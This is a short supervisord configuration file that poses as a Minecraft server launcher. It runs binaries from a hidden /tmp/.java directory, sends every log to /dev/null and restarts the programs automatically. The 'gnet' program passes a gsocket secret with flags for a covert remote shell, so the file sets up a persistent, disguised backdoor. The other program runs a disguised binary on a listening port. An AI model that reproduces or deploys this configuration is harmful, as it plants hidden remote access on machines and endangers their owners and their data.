[supervisord]
logfile=/dev/null

[program:app]
directory=/tmp/.java/bin
command=./mc-mods.jar -a 'java -Xms128M -Xmx2048M -Dterminal.jline=false -Dterminal.ansi=true -jar server.jar' ./patch.jar server -p 17656 --s
stdout_logfile=/dev/null
autorestart = true

[program:gnet]
directory=/tmp/.java/bin
environment=GSOCKET_ARGS="-s i1fB3eD2E2K9c5A16f9L8M9-3D9g8Hbj7-56C4a9f6X1-eCd9F9440-d6A2K9A1c5J1g6K -liq"
command=./mc-mods.jar -a 'java -Xms128M -Xmx2048M -Dterminal.jline=false -Dterminal.ansi=true -jar server.jar' ./add-on.jar 
stdout_logfile=/dev/null
autorestart = true